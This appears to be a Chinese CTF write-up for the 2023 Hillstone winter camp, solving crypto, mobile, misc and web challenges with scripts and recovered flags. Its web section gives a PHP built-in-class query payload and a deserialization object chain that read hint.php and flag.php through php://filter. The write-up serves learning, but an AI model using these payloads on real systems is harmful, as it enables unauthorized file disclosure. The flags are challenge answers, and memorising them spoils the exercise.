第二届山石网科冬令营

Mobile

HSAndroid1


网上找了个脚本,AES 解密即可。脚本里的密钥和 IV 是同一组 16 字节的硬编码常量,所以拿到密文就能直接还原明文。

package Crypto;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class Crypto {


public static String decrypt(String str2, String str22, SecretKey secretKey, IvParameterSpec ivParameterSpec) throws IllegalBlockSizeException, BadPaddingException, InvalidKeyException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
Cipher instance = Cipher.getInstance(str2);
instance.init(2, secretKey, ivParameterSpec);
return new String(instance.doFinal(Base64.getDecoder().decode(str22)));
}


public static void main(String[] args) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
String decryptedString = decrypt("AES/CBC/PKCS5Padding", "HyKsaPpqT4l436tHiSEXtIlLgVV4GE7mGc2WoI0KlP2YhKFco7OPcJYtS58BFwDq", new SecretKeySpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}, 0, 16, "AES"), new IvParameterSpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}));
System.out.println("After decryption - " + decryptedString);
}
}

//hsnctf{android_is_not_e4sy_will_caref1ul}

CRYPTO

daobudao

a3ZxZndpe2owMGdfb3hmbl9rZHloX2l4cX0=

base64:
kvqfwi{j00g_oxfn_kdyh_ixq}

caesar 3:
hsnctf{g00d_luck_have_fun}

strange_chacha

CryptoCTF Aniely原题 参考春哥的wp:https://zhuanlan.zhihu.com/p/545950898

ChaCha 是流密码:由密钥生成一段伪随机密钥流,再与数据异或完成加密。本题在密钥流之外只多异或了一个 2 字节的随机数(重复铺满整段,共 65536 种可能),爆破这个短随机数即可。

from struct import *
from os import *
import itertools

class AS:
    """Keystream generator using the ChaCha20 block layout.

    The state is sixteen 32-bit words: four fixed constants, eight key words
    read little-endian from the passphrase, a two-word block counter that
    starts at zero, and two final words fixed at zero (the nonce slot).
    """

    def __init__(self, passphrase):
        # Must be exactly 32 bytes; go() unpacks it as eight 32-bit words.
        self.passphrase = passphrase

    def go(self):
        """Yield keystream bytes (ints 0-255) without end, 64 per block."""
        mask = 0xffffffff

        def mixer(u, v):
            # Rotate the 32-bit value u left by v bits.
            return ((u << v) & mask) | u >> (32 - v)

        def forge(w, a, b, c, d):
            # Quarter-round: two add/xor/rotate passes, rotating by (16, 12)
            # on the first pass and (8, 7) on the second.
            for rot_d, rot_b in ((16, 12), (8, 7)):
                w[a] = (w[a] + w[b]) & mask
                w[d] = mixer(w[a] ^ w[d], rot_d)
                w[c] = (w[c] + w[d]) & mask
                w[b] = mixer(w[b] ^ w[c], rot_b)

        # Four column rounds followed by four diagonal rounds.
        schedule = (
            (0x0, 0x4, 0x8, 0xc),
            (0x1, 0x5, 0x9, 0xd),
            (0x2, 0x6, 0xa, 0xe),
            (0x3, 0x7, 0xb, 0xf),
            (0x0, 0x5, 0xa, 0xf),
            (0x1, 0x6, 0xb, 0xc),
            (0x2, 0x7, 0x8, 0xd),
            (0x3, 0x4, 0x9, 0xe),
        )

        state = [0x61707865, 0x3320646e, 0x79622d32, 0x6b206574]
        state.extend(unpack('<8L', self.passphrase))
        state.extend([0, 0, 0, 0])  # words 12-13: counter, 14-15: zero

        while True:
            work = state.copy()
            for _ in range(10):
                for lane in schedule:
                    forge(work, *lane)
            # Feed-forward: add the input state to the mixed words, then
            # serialise the block little-endian.
            block = pack('<16L', *((x + y) & mask for x, y in zip(work, state)))
            yield from block
            # 64-bit block counter kept in words 12 (low) and 13 (high).
            state[12] = (state[12] + 1) & mask
            if state[12] == 0:
                state[13] = (state[13] + 1) & mask

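# Challenge material as given in the write-up (hex strings).
key = '52f0907eca3ce05d8d0b6691bb8c8dbca19b63b7bcfcf033fc320f182b5ad610'
enc = '6d9b546c9f1f5e7116203933dabbf25e3a0e143122b20c27e5c83ea26b9d0dbb'

key, enc = map(bytes.fromhex, (key, enc))

# Repeat-and-truncate to exactly 32 bytes. The key above already decodes to
# 32 bytes, so this leaves it unchanged.
key = (key * (32 // len(key) + 1))[:32]

# The keystream depends only on the key, so enc ^ keystream ^ key is the same
# for every candidate. Compute it once instead of re-running the cipher for
# each of the 65536 guesses.
base = bytes(a ^ b ^ c for a, b, c in zip(enc, AS(key).go(), key))

# The only unknown left is a 2-byte value repeated 16 times across the
# message. A 16-bit search space adds no real secrecy on top of the keystream.
for rand in itertools.product(range(256), repeat=2):
    rand = bytes(rand) * 16
    msg = bytes(a ^ b for a, b in zip(base, rand))
    if msg.startswith(b'HSNCTF{'):
        print(msg)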

#HSNCTF{91404a209e0f9ab7d245d5ee}

brute_vigenere

密码表在 26 个小写字母之外多了一对花括号 {},共 28 个字符,所以取模是 28;密钥只有 4 个字符(重复使用),直接爆破即可。

import string
import itertools

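# Alphabet of the cipher: 26 lowercase letters plus the two braces (28 symbols).
dicts = string.ascii_lowercase + "{}"
# Key generation as recorded from the challenge source (4 random symbols
# repeated 8 times):
# key = (''.join([random.choice(dicts) for i in range(4)])) * 8
enc = '{mvjk}gbxyiutfchpm}ylm}a}amuxlmg'

# Loop invariants, computed once instead of once per candidate key.
modulus = len(dicts)
index_of = {ch: pos for pos, ch in enumerate(dicts)}
numenc = [index_of[ch] for ch in enc]

# Exhaustive search over the 28**4 possible 4-symbol keys. A key this short
# is recoverable by brute force regardless of how it was chosen.
for k in itertools.product(dicts, repeat=4):
    key = ''.join(k)
    numkey = [index_of[ch] for ch in k]
    # Vigenere decryption: subtract the key symbol modulo the alphabet size.
    flag = ''.join(
        [dicts[(c - numkey[i % 4]) % modulus] for i, c in enumerate(numenc)]
    )
    if 'hsnctf' in flag:
        print(flag)
        break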

#hsnctf{wecanalwaystrustvigenere}

MISC

签到题

公众号回复签到题即可
hsnctf{welcome_to_hsnctf}

extract

根据 Cloakify.txt 的文件名可知是 Cloakify 隐写:https://github.com/TryCatchHCF/Cloakify
还原后得到一个 txt 文件,文件头是 PK,说明其实是 zip 文件;改后缀后解压,发现是层层嵌套的压缩包(套娃)。

import zipfile
from binascii import *

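# Unwrap a chain of nested zip archives: each archive holds the next one.
#
# Review notes:
# - extractall() writes into the current working directory. Run this in an
#   empty scratch directory when the archive does not come from a trusted
#   source.
# - Nothing here limits nesting depth or unpacked size, so a hostile archive
#   could keep the loop busy or fill the disk.
name = 'f2332'
num = 1  # number of the layer currently being opened
while True:
    # The context manager closes each archive before the next one is opened.
    with zipfile.ZipFile(name + '.zip', 'r') as fz:
        password = name  # only used by the commented-out variant below
        newpassword = None
        for i in fz.namelist():         # walk the member names
            if i.endswith('.zip'):      # member is the next nested archive
                newpassword = i[0:-4]   # its name without the ".zip" suffix
                print(newpassword)
        # fz.extractall(pwd=bytes(password, 'utf-8'))   # password-protected variant
        fz.extractall()
    if newpassword is None:
        # Innermost layer reached: no further archive to open.
        break
    num += 1
    name = newpassword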

解开套娃之后即可得到flag
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}

外星电波~


flag.txt 比 flag.rar 小很多,怀疑里面还有其他文件,但 binwalk 无果;用 010 Editor 查看时发现 hillstone.wav,属于 NTFS 隐写,导出该 wav 文件。

SSTV解密

将 flag.txt 的内容 base64 解码得到 zip 文件,解压即可得到 flag
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}

WEB

Primitive php

参考:https://blog.csdn.net/cjdgg/article/details/115314651
用Exception和<script>alert("1")</script>绕过
payload:?class1=Exception&a=<script>alert('1')</script>&class2=Exception&b=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
拿到源码构造payload

<?php
/**
 * Local stand-in used only to build the serialized string at the end of
 * this script. serialize() records the class name and the public
 * properties, so only those are declared here. $b2 is never assigned and
 * is therefore serialized as null.
 */
class blue
{
public $b1;
public $b2;

// Stores the nested object (or value) in $b1.
public function __construct($b1)
{
$this->b1 = $b1;
}
}

/**
 * Local stand-in with a single public property, $r1. It is used twice in
 * the object graph built at the end of this script.
 */
class red
{
public $r1;

// Stores the nested object (or value) in $r1.
public function __construct($r1)
{
$this->r1 = $r1;
}
}

/**
 * Local stand-in with a single public property, $w.
 */
class white
{
public $w;

// Stores the nested object (or value) in $w.
public function __construct($w)
{
$this->w = $w;
}
}
/**
 * Local stand-in with a single public property, $c1. In the graph built at
 * the end of this script it appears twice: once holding a blue object and
 * once holding the php://filter string.
 */
class color
{
public $c1;

// Stores the nested object (or value) in $c1.
public function __construct($c1)
{
$this->c1 = $c1;
}

}

// Object graph, outermost first: red -> white -> color -> blue -> red -> color.
// The innermost color carries a php://filter URL that base64-encodes
// flag.php. The methods that walk this nesting belong to the target's own
// classes (hint.php), which the write-up does not reproduce.
//
// Defensive takeaway: a graph like this matters only if the application
// feeds request data to unserialize() (presumably the case here). Exchanging
// data as JSON, or calling unserialize($data, ['allowed_classes' => false]),
// removes the object-injection surface.
$payload = new red(
    new white(
        new color(
            new blue(
                new red(
                    new color("php://filter/convert.base64-encode/resource=flag.php")
                )
            )
        )
    )
);
echo urlencode(serialize($payload));

ICS

S7_analysis


hsnctf{399}


第二届山石网科冬令营
https://g1at.github.io/2023/02/06/2023山石冬令营/
作者
g0at
发布于
2023年2月6日
许可协议